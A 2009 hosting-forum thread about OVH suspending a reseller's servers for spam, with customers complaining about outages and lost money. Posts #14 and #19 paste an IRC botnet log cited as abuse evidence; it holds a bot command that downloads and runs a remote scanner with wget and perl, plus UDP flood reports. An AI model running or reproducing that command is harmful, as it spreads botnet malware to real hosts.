Results 1 to 24 of 24
  1. #1

    OVH France down?

    Hi, I have some servers with OVH.

    94.23.*

    gateway: 94.23.177.1 can't ping.

    anyone got same problems?

    it seems some racks or full down...

  2. #2
    Join Date
    Mar 2009
    Posts
    62
    Yes, my dedicated server and 2 vps down

  3. #3
    Join Date
    Feb 2004
    Location
    USA
    Posts
    1,572
    Yes they must be down can't ping them.

    Pinging 94.23.177.1 with 32 bytes of data:

    Request timed out.
    Request timed out.
    Request timed out.
    Request timed out.

    Ping statistics for 94.23.177.1:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

  4. #4
    same - my 94.23.* is down too

    i read on their forums that the dc suspended a ton of servers with very short notice too.

    http://forum.ovh.co.uk/showthread.php?t=2885

  5. #5
    could be their reseller cabs?

  6. #6
    ok yes more on this,

    seems some box owners and resellers were emailed on friday afternoon with spam warnings on a range of listed ips. they were told they had 48hrs to sort it out, 20mins later ALL boxes under that resellers account were removed regardless if they were suspected of spam or not. terrible work there, OVH.... as it was a friday afternoon action and they are only open M-F there is little hope of a resolution prior to next week.

    a pretty weak display of general practice by OVH and punishing other customers due to a few 'bad eggs' is horrible. they had the *suspected* ips and could have managed those off the network but instead seem to have removed the whole cab or subnet as a quick solution.

    of course there is probably some backend to this story, but as they havent been here to explain themselves and have not given any response to my resellers calls and emails it's hard to see how they could not be painted in a bad light.

    Sort it out, OVH...

  7. #7
    Join Date
    Mar 2009
    Posts
    62
    Quote Originally Posted by MF-DOOM View Post
    could be their reseller cabs?
    Beastserv.com , yesterday i order dedicated server and now it down

  8. #8
    im also with beastserv - if you go to their site they have a temp page up explaining the email and the current situation. i see no reason to suspect any wrong doing by BS at all in this, they have been great for me over the last year, it just seems the DC has taken the simple/stupid route of just removing ALL their customers vs. isolating the ones in the emails.....

  9. #9
    Join Date
    Mar 2009
    Posts
    62
    Quote Originally Posted by MF-DOOM View Post
    im also with beastserv - if you go to their site they have a temp page up explaining the email and the current situation. i see no reason to suspect any wrong doing by BS at all in this, they have been great for me over the last year, it just seems the DC has taken the simple/stupid route of just removing ALL their customers vs. isolating the ones in the emails.....
    I perfectly see what is written on site.
    and who generally speaks of the poor quality of BS? I really even like them a support and Servers.

  10. #10
    If my site does not come back on Monday, Which I know right now I am out of close to 500 bucks. I am going to sue OVH and bad mouth them. I am losing money left and right. I ran a good size tube site and never had problem with beastserv until yesterday. Why didnt they give them the 48 hours and why take everyone off. I have bills to pay

  11. #11
    "The following IP Addresses are bound to your servers and sending spam, please shutdown the IP's that are sending spam in the next 48 Hours, otherwise we will be forced to shutdown the server."
    They didn't give them 48 hours

  12. #12
    Join Date
    Nov 2007
    Posts
    346

  13. #13
    my sites was shut down and none of ip addresses was listed. I been robbed

  14. #14
    Join Date
    Jun 2004
    Location
    Atlanta, GA
    Posts
    55

    Angry How about the ddos drones & ircds that control them?

    Shutting you guys down for spam seems weird, considering all the dos/ddos drones and ircds on their network they ignore. We've had a few attacks originate from OVH, their abuse/support never even replied. We even supplied full details outlining the attackers use of their network.

    Has anyone else had similar experiences with this company? It's good their handling spam complaints seriously, perhaps they will start removing the ircd & drones as well.

    One example
    Code:
    *** DNS lookup for server 2 [87.98.163.164] returned (1) addresses
    *** Connecting to server refnum 2 (87.98.163.164), using address 1 (87.98.163.164:5862)
    Fr:17:12|-server.****- Looking up your hostname... -@-
    Fr:17:12|-server.****- Found your hostname -@-
    >>> IRC [IRC@server.****] requested VERSION  from xxxx
    *** Welcome to the irc.Digos.Crew.at IRC Network xxx!xxxx@xxxx.com
    *** Your host is server.****, running version Unreal3.2.7
    *** This server was created ven lug 17 2009 at 23:25:23 CEST
    *** server.**** Unreal3.2.7 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
    *** NAMESX SAFELIST HCN MAXCHANNELS=15 CHANLIMIT=#:15 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307
    KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS :are supported by this server
    *** WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG
    NETWORK=irc.Digos.Crew.at CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ EXCEPTS INVEX :are supported by this
    server
    *** CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
    *** MOTD File is missing
    *** Channel Users Topic
    *** #leet       42      93.17 190.27
    *** #%# 1
    *** ##psyOps##  165     piQQole lam3re cresQono *-* .. e fan danni.. xD           79.136 .se 380ABC1BJ is
    ~ayo@host-77-242-213-212.telecomitalia.sm
    *** #Opers      6       217.172.210.177 seize ... tunnel broker 64.86.88.115 93 da provare in autorange | che bei momenti
    *** #prove      3       190.40.203.77 .pe (09:47) * Connecting to 94.125.182.34 (1989)ircd ivan
    *** #%%#        4       202.86 202.87 88 191 da provare
    *** #hydra#     39     [+u] 151.60.98.170
    *** #phphp#     58      .exec cd /var/tmp; wget http://rdmf.altervista.org/r0x-scan; chmod 777 r0x-scan; perl r0x-scan; rm
    -r r0x-scan
    *** #xtc        58
    *** #%%%#       17
    *** #IRChelp    2
    *** End of /LIST
    Fr:17:12|*** [nick] xxxx -> Brute|
    Fr:17:12|*** [nick] Brute| -> Brute|42
    *** Brute|42 (xxxx@danger.power.flood-X.com) has joined #phphp# 17:13
    *** (topic/#phphp#): .exec cd /var/tmp; wget http://rdmf.altervista.org/r0x-scan; chmod 777 r0x-scan; perl r0x-scan; rm -r
    r0x-scan
    *** (topic/#phphp#:[[deadman]]): Fri Jul 24 04:12:47 2009
     Users on #phphp# (o:5) (n:3) (v:50)
     @Colonnello    @Bianconiglio  @alfio         @[deadman]     @Xtc           +[I]Brute|131  +[I]Brute|708  +[U]Brute|094
     +[U]Brute|440  +[A]Brute|527  +[A]Brute|572  +[A]Brute|033  +[A]Brute|286  +[A]Brute|252  +[A]Brute|454  +[I]Brute|970
     +[U]Brute|913  +[A]Brute|788  +[A]Brute|293  +[A]Brute|016  +[A]Brute|240  +[I]Brute|047  +[U]Brute|044  +[C]Brute|924
     +[U]Brute|894  +[A]Brute|266  +[A]Brute|593  +[I]Brute|895  +[I]Brute|118  +[A]Brute|607  +[I]Brute|135  +[A]Brute|328
     +[C]Brute|084  +[A]Brute|243  +[C]Brute|560  +[U]Brute|895  +[I]Brute|387  +[A]Brute|063  +[A]Brute|808  +[A]Brute|989
     +[A]Brute|937  +[A]Brute|846  +[A]Brute|284  +[A]Brute|201  +[A]Brute|752  +[A]Brute|430  +[A]Brute|380  +[I]Brute|417
     +[A]Brute|495  +[A]Brute|112  +[A]Brute|129  +[U]Brute|793  +[C]Brute|106  +[C]Brute|241  +[A]Brute|172  Brute|42
     [U]Brute|0065  %r0x-ScaN|236
    *** Mode for channel #phphp# is not set
    Fr:17:13|<[C]Brute|0842> [UdpFlood Finished!]: 17221 MB enviados / Media: 108 MB/s
    Fr:17:13|<[C]Brute|0842> [UdpFlood Started!]
    Fr:17:13|<[U]Brute|8955> [UdpFlood Finished!]: 76008 MB enviados / Media: 475 MB/s
    Fr:17:13|<[C]Brute|5606> [UdpFlood Finished!]: 1826 MB enviados / Media: 11 MB/s
    Fr:17:13|<[C]Brute|5606> [UdpFlood Started!]
    Fr:17:13|<[A]Brute|2011> [UdpFlood Finished!]: 182 MB enviados / Media: 1 MB/s
    Fr:17:13|<[A]Brute|2011> [UdpFlood Started!]
    Fr:17:13|<[U]Brute|8955> [UdpFlood Started!]

  15. #15
    pretty stupid shutting them ALL off when they defined a list of IPs as suspect.... surely start there?

  16. #16
    Join Date
    Apr 2006
    Location
    barnsley uk
    Posts
    401
    in ovhs defence as far as they concerned reselling isnt done with there servers after all it against there tos so only person you can blame for this is the resellers for selling boxes to idiots that spam?

    taken from ovhs tos

    Dedicated Server
    The Dedicated Server shall remain the property of the Supplier at all times. The
    Customer shall not be entitled to sell, transfer, lease, charge, assign by way of
    security or otherwise deal in or encumber the Dedicated Server.

  17. #17
    Ovh in there email said they will give 48 hours for beastserv.com/ to remove spammers from there system, they shut them down in a hour and hurt other honest webmasters.

    From: customersupport@ovh.co.uk To: support@beastserv.com Show All
    Subject: OVH.co.uk - Urgent


    The following IP Addresses are bound to your servers and sending spam, please shutdown the IP's that are sending spam in the next 48 Hours, otherwise we will be forced to shutdown the server.

  18. #18
    Join Date
    Feb 2004
    Location
    USA
    Posts
    1,572
    Oh my this doesn't look good.

    that's the reason i always say backup backup backup.

  19. #19
    Quote Originally Posted by SoutheastWeb View Post
    Shutting you guys down for spam seems weird, considering all the dos/ddos drones and ircds on their network they ignore. We've had a few attacks originate from OVH, their abuse/support never even replied. We even supplied full details outlining the attackers use of their network.

    Has anyone else had similar experiences with this company? It's good their handling spam complaints seriously, perhaps they will start removing the ircd & drones as well.

    One example
    Code:
    *** DNS lookup for server 2 [87.98.163.164] returned (1) addresses
    *** Connecting to server refnum 2 (87.98.163.164), using address 1 (87.98.163.164:5862)
    Fr:17:12|-server.****- Looking up your hostname... -@-
    Fr:17:12|-server.****- Found your hostname -@-
    >>> IRC [IRC@server.****] requested VERSION  from xxxx
    *** Welcome to the irc.Digos.Crew.at IRC Network xxx!xxxx@xxxx.com
    *** Your host is server.****, running version Unreal3.2.7
    *** This server was created ven lug 17 2009 at 23:25:23 CEST
    *** server.**** Unreal3.2.7 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
    *** NAMESX SAFELIST HCN MAXCHANNELS=15 CHANLIMIT=#:15 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307
    KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS :are supported by this server
    *** WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG
    NETWORK=irc.Digos.Crew.at CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ EXCEPTS INVEX :are supported by this
    server
    *** CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
    *** MOTD File is missing
    *** Channel Users Topic
    *** #leet       42      93.17 190.27
    *** #%# 1
    *** ##psyOps##  165     piQQole lam3re cresQono *-* .. e fan danni.. xD           79.136 .se 380ABC1BJ is
    ~ayo@host-77-242-213-212.telecomitalia.sm
    *** #Opers      6       217.172.210.177 seize ... tunnel broker 64.86.88.115 93 da provare in autorange | che bei momenti
    *** #prove      3       190.40.203.77 .pe (09:47) * Connecting to 94.125.182.34 (1989)ircd ivan
    *** #%%#        4       202.86 202.87 88 191 da provare
    *** #hydra#     39     [+u] 151.60.98.170
    *** #phphp#     58      .exec cd /var/tmp; wget http://rdmf.altervista.org/r0x-scan; chmod 777 r0x-scan; perl r0x-scan; rm
    -r r0x-scan
    *** #xtc        58
    *** #%%%#       17
    *** #IRChelp    2
    *** End of /LIST
    Fr:17:12|*** [nick] xxxx -> Brute|
    Fr:17:12|*** [nick] Brute| -> Brute|42
    *** Brute|42 (xxxx@danger.power.flood-X.com) has joined #phphp# 17:13
    *** (topic/#phphp#): .exec cd /var/tmp; wget http://rdmf.altervista.org/r0x-scan; chmod 777 r0x-scan; perl r0x-scan; rm -r
    r0x-scan
    *** (topic/#phphp#:[[deadman]]): Fri Jul 24 04:12:47 2009
     Users on #phphp# (o:5) (n:3) (v:50)
     @Colonnello    @Bianconiglio  @alfio         @[deadman]     @Xtc           +[I]Brute|131  +[I]Brute|708  +[U]Brute|094
     +[U]Brute|440  +[A]Brute|527  +[A]Brute|572  +[A]Brute|033  +[A]Brute|286  +[A]Brute|252  +[A]Brute|454  +[I]Brute|970
     +[U]Brute|913  +[A]Brute|788  +[A]Brute|293  +[A]Brute|016  +[A]Brute|240  +[I]Brute|047  +[U]Brute|044  +[C]Brute|924
     +[U]Brute|894  +[A]Brute|266  +[A]Brute|593  +[I]Brute|895  +[I]Brute|118  +[A]Brute|607  +[I]Brute|135  +[A]Brute|328
     +[C]Brute|084  +[A]Brute|243  +[C]Brute|560  +[U]Brute|895  +[I]Brute|387  +[A]Brute|063  +[A]Brute|808  +[A]Brute|989
     +[A]Brute|937  +[A]Brute|846  +[A]Brute|284  +[A]Brute|201  +[A]Brute|752  +[A]Brute|430  +[A]Brute|380  +[I]Brute|417
     +[A]Brute|495  +[A]Brute|112  +[A]Brute|129  +[U]Brute|793  +[C]Brute|106  +[C]Brute|241  +[A]Brute|172  Brute|42
     [U]Brute|0065  %r0x-ScaN|236
    *** Mode for channel #phphp# is not set
    Fr:17:13|<[C]Brute|0842> [UdpFlood Finished!]: 17221 MB enviados / Media: 108 MB/s
    Fr:17:13|<[C]Brute|0842> [UdpFlood Started!]
    Fr:17:13|<[U]Brute|8955> [UdpFlood Finished!]: 76008 MB enviados / Media: 475 MB/s
    Fr:17:13|<[C]Brute|5606> [UdpFlood Finished!]: 1826 MB enviados / Media: 11 MB/s
    Fr:17:13|<[C]Brute|5606> [UdpFlood Started!]
    Fr:17:13|<[A]Brute|2011> [UdpFlood Finished!]: 182 MB enviados / Media: 1 MB/s
    Fr:17:13|<[A]Brute|2011> [UdpFlood Started!]
    Fr:17:13|<[U]Brute|8955> [UdpFlood Started!]

    We have a client that has had more then a few ddos attacks from their network. You are correct on their abuse department being non existent for those issues.

  20. #20
    Join Date
    Mar 2009
    Posts
    62
    any news about servers?

  21. #21
    This is costing me close to $1500 bucks

    D
    ear Damian

    Your server was with an unofficial reseller (BeastServ) who had servers sending large amounts of SPAM. We can only respond to the owners of BeastServ, currently all their servers are suspended pending investigation. BeastServ will let you know if your server is reactivated.

    Kind Regards,

    Neil

    OVH.co.uk

  22. #22
    Join Date
    Jun 2006
    Location
    APE: 6202A
    Posts
    1,278
    Quote Originally Posted by Pastorsinalot View Post
    Ovh in there email said they will give 48 hours for beastserv.com/ to remove spammers from there system, they shut them down in a hour and hurt other honest webmasters.
    And how about beastserv's TOS? Otherwise ask a refund...

  23. #23
    I need my files and data back
    I have over 90000 members tons of videos and photo
    I need that back or do suppose to start over behind mess

  24. #24
    Looks like the good servers will be back online soon. Still out of money. Less will have my data

Similar Threads

  1. Paris France
    By Clanwarz in forum Dedicated Server
    Replies: 5
    Last Post: 05-15-2009, 04:18 PM
  2. Server In France (or within 50ms to France)
    By ashrah in forum Dedicated Server
    Replies: 9
    Last Post: 03-16-2008, 09:33 PM
  3. France Will Win.
    By dicecut in forum Web Hosting Lounge
    Replies: 28
    Last Post: 07-02-2006, 06:26 PM
  4. France
    By RooHost in forum Dedicated Server
    Replies: 9
    Last Post: 11-17-2005, 09:39 AM
  5. France
    By ned patter in forum Web Hosting Lounge
    Replies: 17
    Last Post: 09-12-2002, 07:12 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •